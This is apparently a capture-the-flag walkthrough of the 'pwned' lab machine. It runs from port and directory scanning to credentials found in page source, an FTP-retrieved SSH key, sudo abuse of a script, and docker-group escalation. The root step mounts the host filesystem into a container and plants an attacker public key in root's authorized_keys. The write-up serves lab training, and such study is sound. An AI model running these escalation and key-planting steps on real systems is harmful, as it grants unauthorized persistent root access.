RATING
Intermediate
ENUMERATION
First, we kick it off with our usual nmap scan:
Command: nmap -sV -sC -T4 -Pn -p- 192.168.163.95
Navigating over to the target in our browser doesn’t show us anything too interesting, so we proceed with a directory bruteforce using feroxbuster:
Command: feroxbuster -u http://192.168.163.95/ -w /usr/share/wordlists/dirb/common.txt -k --quiet -s 200
Navigating over to robots.txt, we see 2 directories:
/nothing literally has nothing, but /hidden_text reveals secret.dic which contains the following hidden directories:
We discover that pwned.vuln is the only valid directory:
When viewing the page source, we discover a username and password:
EXPLOITATION
Using this username and password, we are able to FTP to the target. In a folder named share, we find an id_rsa key and note.txt. We download both of these to our local machine:
Viewing the note.txt, we see mention of user ariana:
Using ariana and the id_rsa key, we are able to SSH into the target as this user:
Command: chmod 600 id_rsa
Command: ssh -i id_rsa [email protected]
PRIVILEGE ESCALATION
Running sudo -l reveals that ariana can execute the script messenger.sh as root:
In the home directory, we see a directory for user selena, but we do not have permission to access it:
We can take advantage of the messenger script to get a shell as user selena:
Command: sudo -u selena /home/messenger.sh
We see that user selena is the docker group. This allows us to mount the docker image and read/modify the filesystem:
Command: docker image ls
For this purpose, we can either use the privesc or debian image. We proceed to mount the image.
Command: docker run -it -v /:/host privesc:latest sh
We can now add our local machine’s public SSH key here. If you don’t have one, you can create a pair using ssh-keygen.
Command: mkdir .ssh
Command: echo '[insert public key]' > .ssh/authorized_keys
Now, we can simply SSH to the target as root and grab our flag:
Command: ssh [email protected]
